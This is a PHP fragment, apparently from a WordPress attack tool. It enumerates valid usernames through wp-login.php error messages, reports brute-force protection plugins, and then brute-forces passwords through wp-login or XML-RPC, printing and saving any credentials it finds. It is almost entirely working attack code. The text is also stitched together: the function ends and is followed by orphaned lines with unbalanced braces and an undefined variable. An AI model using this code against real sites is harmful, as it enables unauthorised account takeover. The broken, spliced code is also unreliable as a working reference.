private function brute()
{
if (Config::get('protected')) {
msg("[+] Checking if the site is bruteproof");
$brute = new WPBrute($this->url);
if ($protector = $brute->isProtected()) {
foreach ($protector as $plugin) {
msg("[-] The site is protected by " . $plugin . " plugin");
}
return false;
}
}
if (!file_exists(Config::get('uwordlist'))) {
msg("[-] wordlist file does not exist");
return false;
}
$array = file(Config::get('uwordlist'), FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!empty($array)) {
msg("[+] " . count($array) . " " . $str . "list loaded");
}
$chunks = array_chunk($array, $this->threads);
foreach ($chunks as $uchunk) {
foreach ($uchunk as $username) {
$urls[] = $this->url . '/wp-login.php';
$datas[] = ['log=' . urlencode($username) . '&pwd=klol&wp-submit=Log+In&testcookie=1', ['Content-type: application/x-www-form-urlencoded', 'Cookie: wordpress_test_cookie=WP+Cookie+check']];
}
$responses = HTTPMultiRequest($urls, 1, $datas);
foreach ($responses as $key => $resp) {
if (stripos($resp, '200 ok') and stripos($resp, 'invalid username') === false) {
$users[] = $uchunk[$key];
}
}
unset($datas);
unset($urls);
}
return isset($users) ? array_unique($users) : false;
}
msg("[+] {$user}");
}
} else {
msg("[-] No user was found");
}
}
if (Config::get('bf')) {
msg("");
msg("[+] Bruteforcing");
if (Config::get('xmlrpc')) {
$method = $wpscan->xmlrpc_path ? 'xmlrpc' : 0;
} else {
$method = 'wp-login';
}
if ($method) {
$brute = new WPBrute($wpscan->url);
if (Config::get('ufound')) {
$brute->usernames = false;
if (Config::get('eu')) {
$brute->usernames = $userlist;
}
}
$logins = $brute->brute($method);
if ($logins) {
if (!Config::get('nl')) {
write_info('credentials', $logins);
}
foreach ($logins as $cred) {
msg("[!] " . $cred[0] . ":" . $cred[1]);
}
}